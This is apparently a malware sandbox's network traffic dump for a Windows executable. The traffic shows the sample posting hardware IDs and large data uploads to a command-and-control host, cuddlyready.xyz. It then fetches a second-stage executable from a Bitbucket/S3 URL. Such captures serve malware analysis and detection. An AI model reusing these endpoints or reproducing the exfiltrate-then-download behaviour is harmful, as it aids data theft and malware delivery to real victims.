2024-12-23 08:16:47 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                          Data Ascii: fok 8.46.123.189
2024-12-23 08:16:47 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49728 | 172.67.150.173 | 443 | 4140 | C:\Users\user\Desktop\BJQizQ6sqT.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 08:16:49 UTC | 282 | OUT | POST /api HTTP/1.1
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Content-Type: multipart/form-data; boundary=YHM4QLNTIXGPL8F56EK
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                          Content-Length: 15117
                                                                                                                                                          Host: cuddlyready.xyz
2024-12-23 08:16:49 UTC | 15117 | OUT | Data Ascii: --YHM4QLNTIXGPL8F56EKContent-Disposition: form-data; name="hwid"A179BE43D8540CACAC8923850305D13E--YHM4QLNTIXGPL8F56EKContent-Disposition: form-data; name="pid"2--YHM4QLNTIXGPL8F56EKContent-Disposition: form-data; name="lid"LOGS11--Li
2024-12-23 08:16:50 UTC | 1136 | IN | HTTP/1.1 200 OK
                                                                                                                                                          Date: Mon, 23 Dec 2024 08:16:50 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Set-Cookie: PHPSESSID=6dlroooforsnpvf04ic2inijil; expires=Fri, 18 Apr 2025 02:03:28 GMT; Max-Age=9999999; path=/
                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                          Pragma: no-cache
                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fdeu8%2F7D4ywDW22%2FguGOXVlO5fMjUMhAiB6rY%2FR3K22QJ%2BFJII0MyqNdX3d8BUyqeb4%2BRKGEcMjcWFDqCdbtghL2WbX46DHS0hH5jhLwX41P92POAMwLpfjiXgW0TM%2Foz7I%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8f66e9643c8418b8-EWR
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1537&min_rtt=1533&rtt_var=584&sent=12&recv=19&lost=0&retrans=0&sent_bytes=2836&recv_bytes=16057&delivery_rate=1859872&cwnd=186&unsent_bytes=0&cid=9dac58e003b13733&ts=1284&x=0"
2024-12-23 08:16:50 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                          2024-12-23 08:16:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49739 | 172.67.150.173 | 443 | 4140 | C:\Users\user\Desktop\BJQizQ6sqT.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 08:16:51 UTC | 273 | OUT | POST /api HTTP/1.1
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Content-Type: multipart/form-data; boundary=A3I60YPXCY
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                          Content-Length: 19921
                                                                                                                                                          Host: cuddlyready.xyz
                                                                                                                                                          2024-12-23 08:16:51 UTC15331OUTData Raw: 2d 2d 41 33 49 36 30 59 50 58 43 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 31 37 39 42 45 34 33 44 38 35 34 30 43 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 41 33 49 36 30 59 50 58 43 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 41 33 49 36 30 59 50 58 43 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 41 33 49 36 30 59 50 58 43 59 0d 0a 43 6f
                                                                                                                                                          Data Ascii: --A3I60YPXCYContent-Disposition: form-data; name="hwid"A179BE43D8540CACAC8923850305D13E--A3I60YPXCYContent-Disposition: form-data; name="pid"3--A3I60YPXCYContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--A3I60YPXCYCo
                                                                                                                                                          2024-12-23 08:16:51 UTC4590OUTData Raw: 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                          Data Ascii: ?2+?2+?o?Mp5p_oI
2024-12-23 08:16:52 UTC | 1129 | IN | HTTP/1.1 200 OK
                                                                                                                                                          Date: Mon, 23 Dec 2024 08:16:52 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Set-Cookie: PHPSESSID=hs67i93j2b09jbrcvaflc6g6j3; expires=Fri, 18 Apr 2025 02:03:31 GMT; Max-Age=9999999; path=/
                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                          Pragma: no-cache
                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0AT9DmR4zAgD3WAm5EF6u6CL6h7LqCYgtMMKM368PeVqRu8%2FfKy5b4qOrNBhPdJ0NMWkNrXPwpT18xFk%2BuEQ%2FMCchZjVjbQxyXRV1VkK3eOamoEj8k9%2B1HSxQptKVifiyCA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8f66e9756f4943c8-EWR
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2204&min_rtt=2202&rtt_var=827&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2836&recv_bytes=20874&delivery_rate=1326067&cwnd=192&unsent_bytes=0&cid=7f2e13af24fef404&ts=950&x=0"
2024-12-23 08:16:52 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-23 08:16:52 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49746 | 172.67.150.173 | 443 | 4140 | C:\Users\user\Desktop\BJQizQ6sqT.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 08:16:54 UTC | 274 | OUT | POST /api HTTP/1.1
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Content-Type: multipart/form-data; boundary=OSG0OVPTVU5Q
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                          Content-Length: 1227
                                                                                                                                                          Host: cuddlyready.xyz
                                                                                                                                                          2024-12-23 08:16:54 UTC1227OUTData Raw: 2d 2d 4f 53 47 30 4f 56 50 54 56 55 35 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 31 37 39 42 45 34 33 44 38 35 34 30 43 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4f 53 47 30 4f 56 50 54 56 55 35 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4f 53 47 30 4f 56 50 54 56 55 35 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 4f 53 47 30 4f 56 50 54
                                                                                                                                                          Data Ascii: --OSG0OVPTVU5QContent-Disposition: form-data; name="hwid"A179BE43D8540CACAC8923850305D13E--OSG0OVPTVU5QContent-Disposition: form-data; name="pid"1--OSG0OVPTVU5QContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--OSG0OVPT
2024-12-23 08:16:55 UTC | 1124 | IN | HTTP/1.1 200 OK
                                                                                                                                                          Date: Mon, 23 Dec 2024 08:16:55 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Set-Cookie: PHPSESSID=f44h3n5aec2p6bl4a390og0d84; expires=Fri, 18 Apr 2025 02:03:34 GMT; Max-Age=9999999; path=/
                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                          Pragma: no-cache
                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wGkJr6re3mx7Mg%2FDgCEWXsrcgwcALSRUZt3Si6VU9k9XmJNgBzte6rJUPFXhbGXrBOYPMnhl6BjSlIjdE3t3moXPq2GrE62pFu7IJTaudD%2BJPQsCGLow13tga%2FkR07sX3qs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8f66e9868a804349-EWR
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1710&min_rtt=1709&rtt_var=643&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=2137&delivery_rate=1697674&cwnd=227&unsent_bytes=0&cid=c75c7885fe032ac5&ts=787&x=0"
2024-12-23 08:16:55 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-23 08:16:55 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49752 | 172.67.150.173 | 443 | 4140 | C:\Users\user\Desktop\BJQizQ6sqT.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 08:16:57 UTC | 273 | OUT | POST /api HTTP/1.1
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Content-Type: multipart/form-data; boundary=BEW3OHZ1B
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                          Content-Length: 552416
                                                                                                                                                          Host: cuddlyready.xyz
                                                                                                                                                          2024-12-23 08:16:57 UTC15331OUTData Raw: 2d 2d 42 45 57 33 4f 48 5a 31 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 31 37 39 42 45 34 33 44 38 35 34 30 43 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 42 45 57 33 4f 48 5a 31 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 42 45 57 33 4f 48 5a 31 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 42 45 57 33 4f 48 5a 31 42 0d 0a 43 6f 6e 74 65 6e
                                                                                                                                                          Data Ascii: --BEW3OHZ1BContent-Disposition: form-data; name="hwid"A179BE43D8540CACAC8923850305D13E--BEW3OHZ1BContent-Disposition: form-data; name="pid"1--BEW3OHZ1BContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--BEW3OHZ1BConten
2024-12-23 08:17:00 UTC | 1127 | IN | HTTP/1.1 200 OK
                                                                                                                                                          Date: Mon, 23 Dec 2024 08:17:00 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Set-Cookie: PHPSESSID=lgliq05f2c3gutv1fj7r19cn49; expires=Fri, 18 Apr 2025 02:03:38 GMT; Max-Age=9999999; path=/
                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                          Pragma: no-cache
                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f0DEJ7IbVXIdr7DkDqFbXbbgqMg7rZYYgPtct%2FGFRqNvqc5h7HHzjhTIhVvIcB7frnxzRq75t6bJxehKhViQ6d1kt0vOqDBpPGOHCK3f0Zs6QAT7ZU8fhCHhU7lBju3hUG0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8f66e9963d2f72b7-EWR
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1892&min_rtt=1844&rtt_var=726&sent=194&recv=574&lost=0&retrans=0&sent_bytes=2837&recv_bytes=554909&delivery_rate=1583514&cwnd=192&unsent_bytes=0&cid=fa4b55007a160766&ts=3664&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 49763 | 172.67.150.173 | 443 | 4140 | C:\Users\user\Desktop\BJQizQ6sqT.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 08:17:02 UTC | 263 | OUT | POST /api HTTP/1.1
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                          Content-Length: 88
                                                                                                                                                          Host: cuddlyready.xyz
2024-12-23 08:17:02 UTC | 88 | OUT | Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=A179BE43D8540CACAC8923850305D13E
2024-12-23 08:17:02 UTC | 1127 | IN | HTTP/1.1 200 OK
                                                                                                                                                          Date: Mon, 23 Dec 2024 08:17:02 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Set-Cookie: PHPSESSID=jokmjbneasdvvmgaln77sjqjq6; expires=Fri, 18 Apr 2025 02:03:41 GMT; Max-Age=9999999; path=/
                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                          Pragma: no-cache
                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wKpUZIP4sL6%2FALd2WOVJTaJRW83vGSnH%2BXa5N9SDxhPekgljYcDhENgcLdmMVWsq%2Bh0QIeI11NHtjbhrUpCxP473%2BlhlNa9HSMgcQJrPKTnD3oOU6OLyRjX61S1HT%2BqS5yg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8f66e9b5ec7680d6-EWR
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1485&min_rtt=1478&rtt_var=569&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=987&delivery_rate=1898569&cwnd=193&unsent_bytes=0&cid=34c99bbd3c1d7488&ts=822&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.6 | 49769 | 185.166.143.48 | 443 | 4140 | C:\Users\user\Desktop\BJQizQ6sqT.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 08:17:04 UTC | 248 | OUT | GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                          Host: bitbucket.org
2024-12-23 08:17:05 UTC | 5935 | IN | HTTP/1.1 302 Found
                                                                                                                                                          Date: Mon, 23 Dec 2024 08:17:05 GMT
                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                          Content-Length: 0
                                                                                                                                                          Server: AtlassianEdge
                                                                                                                                                          Location: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNHZYI6IXY&Signature=J4b5F46nqJdxKu%2F94UHON1kWKIg%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAkaCXVzLWVhc3QtMSJHMEUCIEz4aJUGTT3%2F3aj0Sn7nYMfMQonpUyZRFJuL3VakDRucAiEAnHq8hEynshgipHPMX9ETdpZ7Hf7Do5GY23eCDhjjhnUqsAII0f%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDGwYdeefJ7qByxmhkCqEAqZU4UyGCH%2FIwXiBlHEfohy46PnGMfQ7E1PpYAz39S7FGTmhuKzqUff78ACf4GMbiYrBmT9RuUzkS6Gch8a8ELqELgAlkACrGlVQkUjMXlvV7tIEl9F8MrCQmEKAO3ZsuSp2OMS4u3XjM%2F%2FA%2Bm63uHeTE9TKYVc7oOdwav0mPwPXZEbECPwmrRfW%2FUxIHsvqiThPt%2F6Q4jqXHsqNzMwceDkXQHD0olNOLky3nAT%2BFCZYYRBYz8nsw9Z4W16CkLSZ2lFSLBPzD39jNyr6Luh%2Bbp2Im7TrxPYqVsuHTCv01wWV4InZ8Pmq6K1xnmPH%2FwhNJxLwji3W7h4wrFfB5Y%2FJPqqV3ryhMP61pLsGOp0B7rs44luHq97cxYmDLldQ21jEQyqEzNgQtLPiU7epXvR9H58p%2FhwRyUGLWDfqJtktXvdi4w2%2FLn0QPHILI [TRUNCATED]
                                                                                                                                                          Expires: Mon, 23 Dec 2024 08:17:05 GMT
                                                                                                                                                          Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                                                          X-Used-Mesh: False
                                                                                                                                                          Vary: Accept-Language, Origin
                                                                                                                                                          Content-Language: en
                                                                                                                                                          X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                          X-Dc-Location: Micros-3
                                                                                                                                                          X-Served-By: acf7b66233a6
                                                                                                                                                          X-Version: c9b3998323c0
                                                                                                                                                          X-Static-Version: c9b3998323c0
                                                                                                                                                          X-Request-Count: 2740
                                                                                                                                                          X-Render-Time: 0.04756498336791992
                                                                                                                                                          X-B3-Traceid: 32a02be8440e4ca794e59f614b7179f2
                                                                                                                                                          X-B3-Spanid: 33b0f6d2beb25d86
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          Content-Security-Policy: frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; object-src 'none'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net h [TRUNCATED]
                                                                                                                                                          X-Usage-Quota-Remaining: 999140.860
                                                                                                                                                          X-Usage-Request-Cost: 873.17
                                                                                                                                                          X-Usage-User-Time: 0.021696
                                                                                                                                                          X-Usage-System-Time: 0.004499
                                                                                                                                                          X-Usage-Input-Ops: 0
                                                                                                                                                          X-Usage-Output-Ops: 0
                                                                                                                                                          Age: 0
                                                                                                                                                          X-Cache: MISS
                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                          X-Xss-Protection: 1; mode=block
                                                                                                                                                          Atl-Traceid: 32a02be8440e4ca794e59f614b7179f2
                                                                                                                                                          Atl-Request-Id: 32a02be8-440e-4ca7-94e5-9f614b7179f2
                                                                                                                                                          Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                          Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                                                          Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                                                          Server-Timing: atl-edge;dur=161,atl-edge-internal;dur=10,atl-edge-upstream;dur=159,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                                                          Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.6 | 49776 | 3.5.29.90 | 443 | 4140 | C:\Users\user\Desktop\BJQizQ6sqT.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 08:17:07 UTC | 1342 | OUT | GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNHZYI6IXY&Signature=J4b5F46nqJdxKu%2F94UHON1kWKIg%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAkaCXVzLWVhc3QtMSJHMEUCIEz4aJUGTT3%2F3aj0Sn7nYMfMQonpUyZRFJuL3VakDRucAiEAnHq8hEynshgipHPMX9ETdpZ7Hf7Do5GY23eCDhjjhnUqsAII0f%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDGwYdeefJ7qByxmhkCqEAqZU4UyGCH%2FIwXiBlHEfohy46PnGMfQ7E1PpYAz39S7FGTmhuKzqUff78ACf4GMbiYrBmT9RuUzkS6Gch8a8ELqELgAlkACrGlVQkUjMXlvV7tIEl9F8MrCQmEKAO3ZsuSp2OMS4u3XjM%2F%2FA%2Bm63uHeTE9TKYVc7oOdwav0mPwPXZEbECPwmrRfW%2FUxIHsvqiThPt%2F6Q4jqXHsqNzMwceDkXQHD0olNOLky3nAT%2BFCZYYRBYz8nsw9Z4W16CkLSZ2lFSLBPzD39jNyr6Luh%2Bbp2Im7TrxPYqVsuHTCv01wWV4InZ8Pmq6K1xnmPH%2FwhNJxLwji3W7h4wrFfB5Y%2FJPqqV3ryhMP61pLsGOp0B7rs44luHq97cxYmDLldQ21jEQyqEzNgQtLPiU7epXvR9H58p%2FhwRyUGLWDfqJtktXvdi4w2%2FLn0QPHILI%2F%2BgVTSv8F0qx4eoZGi5u1hVCaPz1DmiOUPdtDgGt [TRUNCATED]
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                          Host: bbuseruploads.s3.amazonaws.com
2024-12-23 08:17:07 UTC | 574 | IN | HTTP/1.1 200 OK
                                                                                                                                                          x-amz-id-2: 3Lh+M8pISWlIYTlYKH3QMdGkqDvAWUVwWpwnvMypB+h0cANCfFDoxN7Yrm2AbcNV2IXuitPNG8h47J1JS5vY9ZKbxebG/QjF
                                                                                                                                                          x-amz-request-id: 0DGNA84MA3Z6XE33
                                                                                                                                                          Date: Mon, 23 Dec 2024 08:17:08 GMT
                                                                                                                                                          Last-Modified: Sun, 22 Dec 2024 18:56:57 GMT
                                                                                                                                                          ETag: "73565a0bcdcb7ff5f9ce005a2530e215"
                                                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                                                          x-amz-version-id: 7hbzHT1uhpKzZ7nBtmVCaxIrBpJnNbOS
                                                                                                                                                          Content-Disposition: attachment; filename="FormattingCharitable.exe"
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Content-Type: application/x-msdownload
                                                                                                                                                          Content-Length: 1325507
                                                                                                                                                          Server: AmazonS3
                                                                                                                                                          Connection: close
